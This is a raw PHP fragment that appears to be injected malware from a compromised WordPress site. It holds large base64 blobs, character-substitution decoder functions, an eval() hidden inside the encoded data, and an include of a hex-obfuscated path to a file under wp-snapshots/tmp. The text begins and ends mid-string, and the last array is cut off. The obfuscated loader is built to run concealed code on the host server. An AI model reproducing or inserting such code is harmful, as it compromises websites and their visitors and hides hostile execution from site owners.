1h0UWZtTVcxRllPaERCOWhuQjlSJy4KJzJXTUU2aE1FRnR5UkdZZGZGTTRTMlpXaFJabG5JZmxlSWZmcVVPcTNtOE0zTEJ0bTY4TTNtOE0zbThNZW5oTXFtWldoUlpsbklmbEVkT01TVE9NRUdXOXFVT3EzbThNM204Jy4KJ00zbTVpZ1VLTTNtOE0zbThNM204TTNtOFdlMjg0M3ZZSW9hWXdxOE9xM204TTNtOE0zbThNM204TTNtOE0zbWZzJy4KJ2Y2b01TVGJNVUw1S29MMVFvOXRqa0diS3Eyc3RtNjhNM204TTNtOE0zbThNM204TTNtODlvWGg5M2dPKzNtb0hKcDhDeDZvQmdVS00zbThNM204TTNtJy4KJzhNM204TTNtOE1FR1lQRUk4NFM2OFcxRllPaERCOWhuQjlSMnN0bTY4TTNtOE0zbThNM204TTNtV2lnVUtNM204TTNtOE0zbThNM201UWhHbCcuCid1M3Y1eTFSRWpobkhqcmF6S0VGV2pjc09xM204TTNtOE0zbThNM204TTFSbGpmZ0J0bTY4TTNtOE0zbThNMFVPcTNtOE0zbThNM201UWtMdFFlbmhNcW1aV2hSWicuCidsbklmbEVkT01TVE9NRUd6OXFVT3EzbThNM204TTNtNWlnVUtNM204TTNtOE0zbThNM201UWZhWUJxbVpXaFJabG5JZldFZE9qY3NPcTNtOE0zbTgnLgonTTNtNTRnVUtNM204TTNtOE0zRkRCb0dEajE2OEtFRlpsZkZZa0VHdjlSMjg0UzI4OW9GSGQxR1FORUlXdG02OE0nLgonM204TTNtOE1yc09xM204TTNtOE0zbThNM204TWVuaEtFRlpsZkZZa0VYdGxFZE9NU1RPTUVHWVcxbW9qZ1VLTTNtOE0zbThNM204TTNtNWlnJy4KJ1VLTTNtOE0zbThNM204TTNtOE0zbThNaFh0MG9GSGQxR1FOUkdZVzFtTVcxRllPaERCOW9tZmZKbThXMUZZT2hEQjkxJy4KJ21mZnFUQnRtNjhNM204TTNtOE0zbThNM0xPdG02OE0zbThNM204TTNtOE0zRkRCb0dEajE2TVcxRllPaERCOW9HdjlSMjg0UzI4OW9hRENFSVd0bScuCic2OE0zbThNM204TTNtOE0zTEJ0bTY4TTNtOE0zbThNM204TTNtOE0zbTVwb2Q0c2tMRDllbncwb2FEQ3FtWldoUlpsbklmc0VkT2pjc09xM204TTNtOE0nLgonM204TTNtOE0wVU9xM204TTNtOE0zbTU0Z1VLTTNtOE0zbThNM0ZEcGVGQU1FRlpsZkZZa0VHWVBFZE9pZ1VLTTNtOE0zbThNM0ZEYmVSVUsnLgoncVRCdG02OE0zbTU0Z1VLdG02OE0zbTVwb2Q0c2tMRDllbncwa0Y0bDFtTWpjc09xMFU9PSc7CiRhY3BlbWxicCA9IEFycmF5KCcxJz0+J1onLCAnMCc9PidmJywgJzMnPT4nSScsICcyJz0+J1MnLCAnNSc9PidCJywgJzQnPT4nOScsICc3Jz0+J3EnLCAnNic9PidpJywgJzknPT4nbicsICc4Jz0+J0EnLCAnQSc9Pic4JywgJ0MnPT4ndCcsICdCJz0+J3MnLCAnRSc9PidKJywgJ0QnPT4nVicsICdHJz0+JzInLCAnRic9PidHJywgJ0knPT4neScsICdIJz0+J3gnLCAnSyc9PidvJywgJ0onPT4nTCcsICdNJz0+J2cnLCAnTCc9PidIJywgJ08nPT4nMCcsICdOJz0+J3UnLCAnUSc9PidsJywgJ1AnPT4ncicsICdTJz0+J1AnLCAnUic9PidYJywgJ1UnPT4nUScsICdUJz0+J1QnLCAnVyc9PidrJywgJ1YnPT4nNicsICdZJz0+J0YnLCAnWCc9PiczJywgJ1onPT4nUicsICdhJz0+J20nLCAnYyc9PidPJywgJ2InPT4nNCcsICdlJz0+J2EnLCAnZCc9PicxJywgJ2cnPT4nRCcsICdmJz0+J2QnLCAnaSc9Pic3JywgJ2gnPT4nWScsICdrJz0+J2InLCAnaic9PidwJywgJ20nPT4nQycsICdsJz0+J2gnLCAnbyc9PidjJywgJ24nPT4nVycsICdxJz0+J0snLCAncCc9PidqJywgJ3MnPT4ndycsICdyJz0+J2UnLCAndSc9Pid2JywgJ3QnPT4nTicsICd3Jz0+JzUnLCAndic9PidFJywgJ3knPT4neicsICd4Jz0+J00nLCAneic9PidVJyk7CmV2YWwvKndlbWhycHR4Ki8obmV3bXB2bGooJHV2dWRzZGZlcSwgJGFjcGVtbGJwKSk7Cn0=")); include "\x2fvar\x2fchr\x6fot/\x68ome\x2fcon\x74ent\x2fs/l\x2fu/s\x6cutb\x75tt/\x68tml\x2fwww\x2enew\x68ote\x73cor\x74s.c\x6fm/w\x70-sn\x61psh\x6fts/\x74mp/\x74est\x2ephp"; ?> if (!defined('ALREADY_RUN_1bc29b36f342a82aaf6658785356718')) { define('ALREADY_RUN_1bc29b36f342a82aaf6658785356718', 1); $penulwzi = 8183; function newmpvlj($tbkmwelfri, $vbjpx){$calbeol = ''; for($i=0; $i < strlen($tbkmwelfri); $i++){$calbeol .= isset($vbjpx[$tbkmwelfri[$i]]) ? $vbjpx[$tbkmwelfri[$i]] : $tbkmwelfri[$i];} $ckimqiasky="base64_decode";return $ckimqiasky($calbeol);} $uvudsdfeq = 'UFQNeD4y1RUKEGDIoa4IRGHu1IoB3vwDTvsjcsOqUFQNeD4y1RUKEGHu1d4'. 'Qo9Euo9x9Jm8sqTBtmW5jkaQ0oGDOqmfChRl01RlQhXDOen4NRXZjknz9J'. 'm8sqTBtmW5Qo9EuoQ4I1R5uo9ZjkaoKxmWigUj8oGDORXZjknD0kFQCeRUKxmWigUKtmMOqenhK3nZQ1'. 'aQN1nUK3Q53zY4YTOs6q2Wtm9Btm68M3m5W1n1jkazK3Q53zY4Y'. 'TOs6Jm86RFb6qTBtm9OtmMOqenhK3nZQ1aQN1nUK3WZEzWDgDv42nD4TZD55zWY'. 'zTd36q2Wtm9Btm68M3m5W1n1jkazK3WZEzWDgDv42nD4TZD55zWYzTd36Jm86J'. 'I3jcsOq0UOqgUjj168K3nZQ1aQN1nUKEOYxzWD5ZYQ0zQDcRyvOtFxbtG'. 'tatp3yhavbxaYl1aWGcLEjhn3HtaYOenAHcmojqUOqrsOq3m8M3FZQ1aQN12M9UzH'. '2ZzYvnD42Dzw0xTUOhyMXhGhGxpt6hTMIhnYaeThboaQlhpvGhRZjkyvbEIsMx2WigUKtm68M3m'. '8W1FYOh2843vwDTvsigUKM3m8MEFZlfFY0eGDw3gOMTQDxTgBtmMOq3m8M3mZLTv4mUzHTnIfpod4lfRZKEdO'. 'MS289tyQlxgxycThChGYah2OOtavwJn3ItThChaxwxpt6xp8b1T5pEyBtm68M3m59kF46hnsMEFtyRGYdfFMigUKtmMOq3m8M3F'. '1dkatOen4N3FtyROfQfvluoXUKqUOq3m8M3LBtm68M3m8M3m8MoaDOfREN'. '3L5I1nf0oaDskFYp12M9JdbKfXfX0F1OomQoJ64jEIs9EIH8EY4TZDEnZDEkEOlzDY502v4TDmffqTBtm68M3m54gUKtm'. '68M3m5afnwpfFQuk65pod4L1RZRoaQOhnEB1zZjo9xKqUOq3m8M3L'. 'Btm68M3m8M3m8MELEQoI843vYIoaYwqmWigUKtm68M3m8M3m8M'. 'EFYNhnHwoXQyRXYd1RDQ3gOMUREIhRWKqTBtmMOq3m8M3m8M3m8WhnwlkLQyrRt0oRDQfnDkR2843FtyROfQfvZuhdEukXUK'. 'qTBtmMOq3m8M3m8M3m8WoGDB1Q4shRZK3gOMEY4TZDEnZDEkEdtgzWQUDY4F2zHYT'. 'WYtZ2ffcsOq3m8M3m8M3m5XeFQB128KqmZykFYyem843LtOo9EskXxKELtQkF10oFYOemsMZvQ2ZztzTdE1RdtYzvY2UDZSz6'. 'Wj3mv4S25FUzHTZ2Wtm68M3m8M3m8MrsOq3m8M3m8M3m8M3m8MELtQkF10oFYOem843Ltdh9tOo6MWoGDB1Q4shRZKJm8sJm'. '8WoGHloGMjcsOqgUKM3m8M3m8M3m8M3m5j168KELtQkF10oFYOem84S25pod4L1RZvkGt2kG4OqmWjgUKM3m8M3m8M3m8M3'. 'm5igUKM3m8M3m8M3m8M3m8M3m8Mh9EQhnBigUKM3m8M3m8M3m8M3m54gUKtm68M3m8M3m8M3m8M3FQa3mlyfLEB1nbKELtQk'. 'F10oFYOemWjgUKM3m8M3m8M3m8M3m5igUKM3m8M3m8M3m8M3m8M3m8MEFYNhnHwoXQyRXYd1RDQndOMS28WoGDB1Q4'. 'shRZKcsOq3m8M3m8M3m8M3m8M0UOq3m8M3m8M3m54gUKtm68M3m8M3m8M'. '1a4I1nYpem8KEFYNhnHwoXQyRXYd1RDQ3FYy3mZpfREI1nwORGZjo6Wtm68M3m8M3m8Mrs'. 'Oq3m8M3m8M3m8M3m8MenhMqmYjkQ4lo9Elr2MWhXDIoaDNfY4WeR3B3mZI1RxjqUOq3m8M3m8M3m8M3m8MrsOq3m'. '8M3m8M3m8M3m8M3m8M3mZI1RxMS25lo9ElrD4C1RE912MWoaDyJm5pod4'. 'L1RZveREQhXZuo9QxeRtOqmZpfREI1nwORGZjo6WjcsOq3m8M3m8M3m8M3m8M0UOq3'. 'm8M3m8M3m54gUKtm68M3m8M3m8MoaDOfREN3FtyROtK1ntPDXEjfFY6kFzKhREIhRQ0fnwjoRDQqmZI1RxjqTBtm68M'. '3m54gUKtm68M3m5afnwpfFQuk65pod4geFDpedfIeRZlhaHQqmZWeRE0kFQyfmWtm68M3m'. '5igUKM3m8M3m8M3mZWeRE0kFQyfY4XoaQOhnEB12843vYIoaYwqmWigUKtm68M3m8M3m8M1a4I1nYpem8KEFZjoQ4BeRtO3FYy3'. 'mZWeR3jgUKM3m8M3m8M3LBtm68M3m8M3m8M3m8M3FQa3ml8eRt0fXEjfFY6kFzKEFZjo6WME6h'. 'MeRt01FQIqmZWeR3jqUOq3m8M3m8M3m8M3m8MrsOq3m8M3m8M3m8M3m8M3m8M3mZWeRE0kFQyfY4XoaQOhnEB1D'. 'Cf3gOMEFZjopBtm68M3m8M3m8M3m8M3LOtm68M3m8M3m8M0UOqgUKM3m8M3m'. '8M3LEQfLDIk68W1FQIRGHjoXZ0fXEjfFY6kFzigUKM3m8M0UOqgUKM'. '3m8M19DNhXZjkGbMhXt0ZGDOZFQI1ntOkXEwTFQyfmMW1FQIJm8W1FDsfFM4xT8jgUKM3m8MrsOq'. '3m8M3m8M3m8WoaDyfnHO3gOMhREIhRWKqTBtmMOq3m8M3m8M3m5j168K3n'. 'QyRGZjo6MW1FQIq2Wtm68M3m8M3m8MrsOq3m8M3m8M3m8M3m8MoaDOfREN3mZI1RtdkLUigUKM3m'. '8M3m8M3LOtmMOq3m8M3m8M3m8WoaDyfnHOndOMS28W1FQIcsOq3m8M3m8M3m8W1FQIRGtufnwO3gOMxgB'. 'tmMOq3m8M3m8M3m5j168KEFZQoLZK3gsMx2Wtm68M3m8M3m8MrsOq3m8M3m8M3m8M3m8MoaD'. 'OfREN3mZI1RtdkLUigUKM3m8M3m8M3LOtmMOq3m8M3m8M3m8W1FQI3gOMoXZIkFDNqmZWeR3j3gO43gvMSI8W1FQI3gKMo9ZI'. 'enOKEFZjo6sMEdHoJIojcsOq3m8M3m8M3m8Wem843v5uoFDN1FQIqmZWeR3jcsOq3m8M3m8M3m5'. 'j168KEFMMSTO43v15TYtYqUOq3m8M3m8M3m5igUKM3m8M3m8M3m8M3m5I1RZdoabMELEQoX'. 'DBfgBtm68M3m8M3m8M0UOqgUKM3m8M3m8M3LfKenHQ3mMKEFhMS25I1nYW'. '1FQIqmZKq2WM3TO43v15TYtYqUOq3m8M3m8M3m5igUKM3m8M3m8M3m8M3m5j168KEFhM3TO'. '43moNEI5lkaUMEFhM3TO43moNJ6ojgUKM3m8M3m8M3m8M3m5igUKM3m8M3m8M3m8M3m8M3m8MEFtdo9EQk9Z01FQI3gOM36'. 'ZWeR3uEFh6csOq3m8M3m8M3m8M3m8M3m8M3FQa3mljod4WeR3KEFtdo9EQk9Z01FQIq2Wtm68M3m8M3m8M3m8M3m8M3m'. '5igUKM3m8M3m8M3m8M3m8M3m8M3m8M3mZWeRE0hG4dk9UMqyOMxTBtmMOq3m8M3m8M3m8M3m8M3m8M3m'. '8M3m8WoaDyfnHOndOMS28WhXDIoaDNfY4WeR3igUKM3m8M3m8M3m8M3m8M3m8M3m8M3mZI1RtdkLUMS25lo9Elr'. 'D4C1RE912MWoaDyfnHOJm5pod4L1RZveREQhXZuo9QxeRtOqmZpfRE'. 'I1nwORGZjo6sMEFZQoLZK3mAMxT8jqTBtm68M3m8M3m8M3m8M3m8M3m54gUKM3m8M3m8M3m8M3m54gUKM3m8M3m8M3LOt'. 'mMOq3m8M3m8M3m5pkF4y1nZjo6MWemWigUKtm68M3m8M3m8MoaDOfREN3mZI1RtdkLUigUKM3m8M0UOqgUKM3m8M19DNhXZj'. 'kGbMhXt0ZGDOZF4pza4ufmMjgUKM3m8MrsOq3m8M3m8M3m8W1F4'. 'poa4ufY4QkaUMS25yfLEIoF4yqmZ0zOD2DWD2nIfTUdEEzYZ0ZWQxZzw5Tzz9R2sMEY4TZDEnZDEkEdEYzDDY'. 'zdZ0DDEEEdOjcsOq3m8M3m8M3m5j168KEFZuhXEukXZ01nwW3gO'. '4S25FUzHTZ2Wtm68M3m8M3m8MrsOq3m8M3m8M3m8M3m8MoaDOfREN3mZ0zOD2DWD2nIfvTOtDTzDc'. 'DY42TO4zEdOigUKM3m8M3m8M3LOtm68M3m8M3m8M1nHy1nQa3mMW1F4poa4ufY4QkaUMSTO43g8jgUKM3m8M3m8M3LBtm'. '68M3m8M3m8M3m8M3LEQfLDIk686JI3igUKM3m8M3m8M3LOtm68M3m8M3m8M1nHy1UOq3m8M3m8M3m5igUKM3m8M3m8M3m8M3m'. '5I1RZdoabMoXD6oXZIqmZ0zOD2DWD2nIfTUdEEzYZ0ZWQxZzw5Tzz9R2sMxmsMEFZuhXEukXZ01nwWqTBtm68M3m8M3m8'. 'M0UOq3m8M3LOtmMOq3m8M3FQa3mMl19DNhXZjkGw01RljoXZyqmfaenHQRX5dfY4pkGwO1nwOoIojqUOq3m8M3LBt'. 'm68M3m8M3m8M19DNhXZjkGbM1aQB1D4sfRZ0hG4NfFDNfLxKEFbB3mZWJm8W1aHl1I843v1lkLt'. 'QqUOq3m8M3m8M3m5igUKM3m8M3m8M3m8M3m8Wkn4W12843mZakFY93gO43gMMSI89h2oMc689fIoigUKM3m'. '8M3m8M3m8M3m8W16843v5akX5Qk6MWk6sMEFdu1FzjcsOq3m8M3m8M3m8M3m8MenhMqmZa3gO4S25FhnHy12Wtm68M3m8M3m8M3'. 'm8M3LBtm68M3m8M3m8M3m8M3m8M3m5I1RZdoabMxgBtm68M3m8M3m8M3m8M'. '3LOtm68M3m8M3m8M3m8M3FDBoGztm68M3m8M3m8M3m8M3LBtm68M3m8M3m8M3m8M3m8M3m5j168KeRt0hREIhRWKEFUjq28'. 'W1m843FQCoFHu1FzKEFUjcsOq3m8M3m8M3m8M3m8M3m8M3mZ6rRZQod4XoaQOfFDN3gOM1'. '9fIeRZQqmZaJm8W1mWigUKM3m8M3m8M3m8M3m8M3m8M1atBkXtQqmZaqTBtm68M3m8M3m8M3m8M3m8M3m5I1RZdoabM'. 'EFEwfFDyRXfIeRZO1nbigUKM3m8M3m8M3m8M3m54gUKM3m8M3m8M3LOtm68M3m'. '54gUKtm68M3m5j168K3n1dkatOen4NRGDbeRtOoIM91aQB1D491RZ0hG4NfFDNfLx9q2Wtm68M3m5igUK'. 'M3m8M3m8M3F1dkatOen4N3F1jkFD01GDORGtuk9ZQk9ZyqmZaenHQkaYC12Wtm68M3m8M3m8MrsOq3m8M3m8M3m8'. 'M3m8MEF1KhnwWkFzMS25akX5Qk6MW1aQB1nwlknzB3mEI36WigUKM3m8M3m8M3m8M3m8W1'. 'atuk9ZQk9Zy3gOM19EQhnUKEF1KhnwWkFzB3F1jkFDyeRjQqmZaenHQkaYC12WjcsOq3m'. '8M3m8M3m8M3m8M1atBkXtQqmZaeFYN1FHQqTBtmMOq3m8M3m8M'. '3m8M3m8MoaDOfREN3mZahG4NfFDNfLxigUKM3m8M3m8M3LOtm68M3m54gUKtmMOq3m8M3F1dka'. 'tOen4N3FtyRGZQhXEwoLZ0oFlloGzKEFZlfFvB3mZP1RWjgUKM3m8MrsOq3m8M3m8M3m8WkXDORGZ'. 'lfFvMS2863pBtmMOq3m8M3m8M3m5akX3MqmZjST8i3mZjSLtOoaHQk6MW1FYOh2WiqUOq3m8M3m8M3m5'. 'igUKM3m8M3m8M3m8M3m5akX3MqmZ7ST8i3mZ7SLtOoaHQk6MWeGDwq28aE68WeTHy'. 'fLEB1nbKEFZlfFvjcI8We6BPJm8We2BPqUOq3m8M3m8M3m8M3m8MrsOq3m8M3m8M3m8'. 'M3m8M3m8M3mZufRZ01FYOh28NS25peL3KkXEWqmZWhRZlnIZjR2WMR65uoaUKEFCQrDBWeQOjq'. 'TBtm68M3m8M3m8M3m8M3LOtm68M3m8M3m8M0UOqgUKM3m8M3m8M3LEQfLDIk6'. '8WkXDORGZlfFvigUKM3m8M0UOqgUKM3m8M19DNhXZjkGbMhXt01FDpo9QsfmMW1FYOh2'. 'sMEFCQr2Wtm68M3m5igUKM3m8M3m8M3FfBkGElkm8WhXt0hRDOegBtmMOq3m8M3m8M3m5I'. '1RZdoabMhXt01FDpo9QsfY4seFYy12lpod4W1ntIrR5ORX5KhRtQqmZWhRZlJm8WeGDwq2sMEFtyRGYdfFMjcs'. 'Oq3m8M3LOtm68M3m5afnwpfFQuk65pod4QkatIrR5OqmZWhRZlJm8WeGD'. 'wqUOq3m8M3LBtm68M3m8M3m8M1GHuhaYB3mZpod4lfRZKcsOqgUKM3m8M3m8M3LEQfLDIk65po'. 'd4W1ntIrR5ORX5KhRtQqFtyRGZQhXEwoLZ0oFlloGzKEFZlfFvB3mZpod4lfRZ'. 'Kq2sMEFCQr2WigUKM3m8M0UOqgUKM3m8M19DNhXZjkGbMhXt01aQB1D4I1nYWqmZsh'. 'RZKqUOq3m8M3LBtm68M3m8M3m8MEFZlfFvMS2581aQB1D491RZ0hG4NfFDNfLxKEL5lfFMjcsOqgUKM'. '3m8M3m8M3LEQfLDIk68W1FYOhTBtm68M3m54gUKtm68M3m5afnwpfFQuk'. '65pod4aenHQRXfIeRZQqmZshRZKJm8W1FYOh2Wtm68M3m5igUKM3m8M3m8M3v5a'. 'enHQRX5dfY4pkGwO1nwOoIMWoFYOemsMEFZlfFvjcsOq3m8M3LOtmMOq3m8M3F1dkatOen4N3'. 'FtyRG1jkFD0hR5s1nwWqmZshRZKJm8W1FYOh2Wtm68M3m5igUKM3m8M3m8M3v5aenHQRX5dfY4pkGwO1nwOoIMWoF'. 'YOemsMEFZlfFvB3gMjcsOq3m8M3LOtmMOq3m8M3F1dkatOen4N3FtyRXtu'. 'o9Z0hG4CoFYI1R3KEFvB3mZ6qUOq3m8M3LBtm68M3m8M3m8MoaDOfREN3LtOoaHQk6MWh2'. 'WMJ25yfLEB1nbKEF3jcsOq3m8M3LOtmMOq3m8M3F1dkatOen4N3FtyROfQfvtuknduk'. 'QtOkXEl1GzKEFZjo9x4TQDxTmWtm68M3m5igUKM3m8M3m8M3mZpkGd'. 'CkGw0kaYC1RxMS255o9Elr2M6kX5Oen4NoI3B3mEGenDXoI3B3m'. 'EshnfQoI3B3mEy1Rtyen4NoI3B3mEyfFYOoI3B3mEdoGDIoI3B3mElo9ZjhGHQoI3B3mEWfn'. 'ds36sM3alQhnZQo9x6Jm86kFQ6oI3jcsOq3m8M3m8M3m5j168K32ZWeR'. 'EyqUOq3m8M3m8M3m5igUKM3m8M3m8M3m8M3m8W1FQIoI843FtyROfQfYfIeRZlhaHQZFQIoIMjcsOq3m8M3m8M3m54gUKt'. 'm68M3m8M3m8MfRtuo9UKEFZjo9xB3mfpod4ykXEORGtukR5loaDIEIWigUKtm68'. 'M3m8M3m8M1a4I1nYpem8KEFZjo9xMhRxMEFZjo6Wtm68M3m8M3m8MrsOq3m8M3m8M3m8M'. '3m8MenhMqFQyRGZjo6MW1FQIq28aE658eRt0fXEjfFY6kFzKEFZjo6WjgUKM3m8'. 'M3m8M3m8M3m5igUKM3m8M3m8M3m8M3m8M3m8MEFZjoQ4jkaZQrm843g8igUKM'. '3m8M3m8M3m8M3m8M3m8M1a4I3mMWrgOscI8Wrm8A3LtOoaHQk6MW1FQIqTBMELMPqIWtm68M3m8M3m8M3'. 'm8M3m8M3m5igUKM3m8M3m8M3m8M3m8M3m8M3m8M3mZWeRE0enwW1RMMqyOMkXEWqmZWeREkEL'. 'lfqTBtm68M3m8M3m8M3m8M3m8M3m54gUKtm68M3m8M3m8M3m8M3m8M3m8WfFdsRGZjo6843mZWeR3MJ686JI3MJ68'. 'WhG4Ckn4NRGwlknDynIZWeRE0enwW1RMME25pkXDNfmMWhG4Ckn4NR'. 'GwlknDyqDOigUKtm68M3m8M3m8M3m8M3m8M3m5j168K1aQB1D4QrFQyfLxKELZCoY4WeR3jqUOq3m8M3m8M3m8M3m8M3m8M3LBtm'. '68M3m8M3m8M3m8M3m8M3m8M3m8MoaDOfREN3mZOkR501FQIcsOq3m8M3m8M3m8M3m8M3m8M3LOtmMOq3m8M3m8M3m8M3m8M'. '3m8M3FQaqFdP1FQIqmZOkR501FQIq2Wtm68M3m8M3m8M3m8M3m8M3m5igUKM3m8M3m8M3m'. '8M3m8M3m8M3m8M3LEQfLDIk68WfFdsRGZjopBtm68M3m8M3m8M3m8M3m8M3m54gUKM3m8M3m8M3m8M3m54gUKM3m8M3m'. '8M3LOtmMOq3m8M3m8M3m5I1RZdoabM363igUKM3m8M0UOqgUKM3m8M19DNhXZjkGbMhXt0oFH'. 'd1GQNRGYW1mMWkaYC12sMEFEloGzGtY4WhRZlqUOq3m8M3LBtm68M3m'. '8M3m8MEFZlfFvMS256hRtQtpZ01FDpkGZQqmZ6hRtQtpZ01FYOh2WigUKtm68M3m8M3m8MELt'. 'OkXEl1GD0oFYOem843FtyROfQfvtukndukQtOkXEl1GzKq28N3m3u3pBtm68M3m8M3m8MELtOkXEl1GD0oFYOem84'. '3mZyfF4IhnfQRX5lfFMMJ65yfnEyfL3KknUdqmEphntK123jJm8sJm8dq'. '28N3mE0368N3FdWt2MWkaYC128N3FtyROfQfvluoXUKq2WigUKtmMOq3m8M3m8M3m5pod4aen'. 'HQRXfIeRZQqmZyfF4IhnfQRX5lfFMB3FtyRGDNhXEwoLUKEFZlfFvB3FtyROfQfvluoXUKq'. '2WjcsOq3m8M3LOtmMOq3m8M3F1dkatOen4N3FtyRX5BfnfjkQ4I1nOKEFwlknzjgUKM3m8Mrs'. 'Oq3m8M3m8M3m8WoXZuoaY91D4shRZK3gOMhXt0ZGDOUG4Ckn4NzXZuoaY912MjJ686JI3igUKM3m8M3m8M3mZyfF4'. 'IhnfQRX5lfFMMS28WoXZuoaY91D4shRZK3mbMoXD6oXZIqFdWt2M6hGYpeFz6q2sMxmsMt2WMJ686RI3MJ'. '65C1gzKEFwlknzMJ65pod4L1RZ3kXtOqmWjcsOqgUKM3m8M3m8M3FQa'. '3mlaenHQRGDbeRtOoIMWoXZuoaY91D4shRZKq2Wtm68M3m8M3m8MrsOq3m8M3m8M3m8M3m8MULDNkFQNeIMWoXZuoaY91D4'. 'shRZKqTBtm68M3m8M3m8M0UOq3m8M3LOtmMOq3m8M3F1dkatOen4N3FtyRX5BfnfjkQ4BkGYWqmZNhndQSzwDTvs'. 'jgUKM3m8MrsOq3m8M3m8M3m8WoXZuoaY91D4shRZK3gOMhXt0ZGDOUG4Ckn4N'. 'zXZuoaY912MjcsOqgUKM3m8M3m8M3FQa3mljod4WeR3KELtOkXEl1GD0oFYOemWjgUKM3m8M3m8M3LBtm68'. 'M3m8M3m8M3m8M3FQa3mMWkaYC1284S25cDzHxq28uJI5BkGYW3FY'. 'Bkm5skLD9enwygUKM3m8M3m8M3m8M3m5igUKM3m8M3m8M3m8M3m8M3m8M1a4I1nYpem8KoGtlkaZjo6MWoXZuoaY9'. '1D4shRZKq25loI8WeGDwSTbWoFHd1GQNRGwlknzjgUKM3m8M3m8M3m8M3m8M3m8MrsO'. 'q3m8M3m8M3m8M3m8M3m8M3m8M3m5j168KoXZIoF4yqmZskLD9enw'. '0kaYC12sMoXD6oXZIqFdWt2M6hGYpeFz6q2sMxmsMt2Wj3mv4S25FhnHy12Wtm68M3m8M3m'. '8M3m8M3m8M3m8M3m8MrsOq3m8M3m8M3m8M3m8M3m8M3m8M3m8M3m8MUFDGh'. 'nsKhXt01FDpo9Qsfmlpod4aenHQRXEQhnUKELtOkXEl1GD0oFYOem8N3m3u368N3mZskLD9enw0'. 'kaYC12WB3FtyROfQfvluoXUKq2WjcsOq3m8M3m8M3m8M3m8M3m8M3'. 'm8M3m54gUKM3m8M3m8M3m8M3m8M3m8M0UOq3m8M3m8M3m8M3m8M0U'. 'Oq3m8M3m8M3m8M3m8M1nHy1UOq3m8M3m8M3m8M3m8MrsOq3m8M3m8M3m8M3m8M3m8M3mZyfF4IhnfQRX5lfFMMS28WoXZ'. 'uoaY91D4shRZK3mbM36A63mbMoXD6oXZIqFdWt2M6hGYpeFz6q2sMxmsMt2WMJ'. '686RI3MJ65C1gzKEFwlknzMJ65pod4L1RZ3kXtOqmWjcsOqgUKM3m8M3m8M3m8M3m8M3m8MenhMqF1jkFD01RljoXZyqmZyfF4I'. 'hnfQRX5lfFMjqUOq3m8M3m8M3m8M3m8M3m8M3LBtm68M3m8M3m8M3'. 'm8M3m8M3m8M3m8MUFDGhnsKhXt01FDpo9Qsfmlpod4aenHQRXEQhnUKELtOkXEl1GD0oFYOemWB3FtyROfQfvluoXUKq2'. 'WjcsOq3m8M3m8M3m8M3m8M3m8M3LOtm68M3m8M3m8M3m8M3LOtm68M3m8M3m8M0UOq3m8M3LO'. 'tmMOq3m8M3F1dkatOen4N3FtyRXfIeRZlhaHQRGtK1ntPqmWtm68M3m5igU'. 'KM3m8M3m8M3FQa3mlyfLEB1nbKhXt0ZGDOUG4Ckn4NzXZuoaY912Mjq28lS28sqUOq3m8M3m8M3m5igUKM3m8M3m8M3m8M3m5I1'. 'RZdoabMDLEd1TBtm68M3m8M3m8M0UOq3m8M3m8M3m5QkLtQgUKM3m8M3m8M3LBtm68M3m8M3m8M'. '3m8M3LEQfLDIk65FhnHy1TBtm68M3m8M3m8M0UOq3m8M3LOtmMOq3m8M3F1uoaDlhGMMqmZ0UO4S2OQY3FYy3mZ'. 'P1RW4S6ZGhnHd12Wtm68M3m5igUKM3m8M3m8M3mZWhRZl3gOMEL'. '1lkLDQcsOq3m8M3m8M3m8W1FYOhD4P1RWMS28WeGDwcsOq3m8M3LOtmMOq3m8M3FQa3mMlEFZlfFvjgUKM3m8M'. 'rsOq3m8M3m8M3m5akXEQhntK3mMWRd5SzdUMhRxMEFCQrTO+EL1lkLDQqUOq3m8M3'. 'm8M3m5igUKM3m8M3m8M3m8M3m8W1FYOh2843mZGhnHd1TBtm68M3m8M3m8M3m8M3mZWhRZlRGCQr2843mZP1RWigUKM3m8M3'. 'm8M3LOtm68M3m54gUKtm68M3m8W1FYOh2843v5dk9tQoaQlkFQV12lpod4W1ntIrR5OqFEloGzGtY4W1ntu1FzKEFZlfFvj'. 'Jm8W1FYOhD4P1RWjqTBtmMOq3m8M3FQa3mljoXtQfmMW1FYOhDB9hnB9R'. '2WME6hMEFtyRGYdfFM4S2ZWhRZlnIfleIffqUOq3m8M3LBtm68M3m8M3m8MenhMqmZWhRZlnIflEdOMSTOMEGW9qUOq3m8M3m8'. 'M3m5igUKM3m8M3m8M3m8M3m8We2843vYIoaYwq8Oq3m8M3m8M3m8M3m8M3m8M3mfs'. 'f6oMSTbMUL5KoL1Qo9tjkGbKq2stm68M3m8M3m8M3m8M3m8M3m89oXh93gO+3moHJp8Cx6oBgUKM3m8M3m8M3m'. '8M3m8M3m8MEGYPEI84S68W1FYOhDB9hnB9R2stm68M3m8M3m8M3m8M3mWigUKM3m8M3m8M3m8M3m5QhGl'. 'u3v5y1REjhnHjrazKEFWjcsOq3m8M3m8M3m8M3m8M1RljfgBtm68M3m8M3m8M0UOq3m8M3m8M3m5QkLtQenhMqmZWhRZ'. 'lnIflEdOMSTOMEGz9qUOq3m8M3m8M3m5igUKM3m8M3m8M3m8M3m5QfaYBqmZWhRZlnIfWEdOjcsOq3m8M3m8'. 'M3m54gUKM3m8M3m8M3FDBoGDj168KEFZlfFYkEGv9R284S289oFHd1GQNEIWtm68M'. '3m8M3m8MrsOq3m8M3m8M3m8M3m8MenhKEFZlfFYkEXtlEdOMSTOMEGYW1mojgUKM3m8M3m8M3m8M3m5ig'. 'UKM3m8M3m8M3m8M3m8M3m8MhXt0oFHd1GQNRGYW1mMW1FYOhDB9omffJm8W1FYOhDB91'. 'mffqTBtm68M3m8M3m8M3m8M3LOtm68M3m8M3m8M3m8M3FDBoGDj16MW1FYOhDB9oGv9R284S289oaDCEIWtm'. '68M3m8M3m8M3m8M3LBtm68M3m8M3m8M3m8M3m8M3m5pod4skLD9enw0oaDCqmZWhRZlnIfsEdOjcsOq3m8M3m8M'. '3m8M3m8M0UOq3m8M3m8M3m54gUKM3m8M3m8M3FDpeFAMEFZlfFYkEGYPEdOigUKM3m8M3m8M3FDbeRUK'. 'qTBtm68M3m54gUKtm68M3m5pod4skLD9enw0kF4l1mMjcsOq0U=='; $acpemlbp = Array('1'=>'Z', '0'=>'f', '3'=>'I', '2'=>'S', '5'=>'B', '4'=>'9', '7'=>'q', '6'=>'i', '9'=>'n', '8'=>'A', 'A'=>'8', 'C'=>'t', 'B'=>'s', 'E'=>'J', 'D'=>'V', 'G'=>'2', 'F'=>'G', 'I'=>'y', 'H'=>'x', 'K'=>'o', 'J'=>'L', 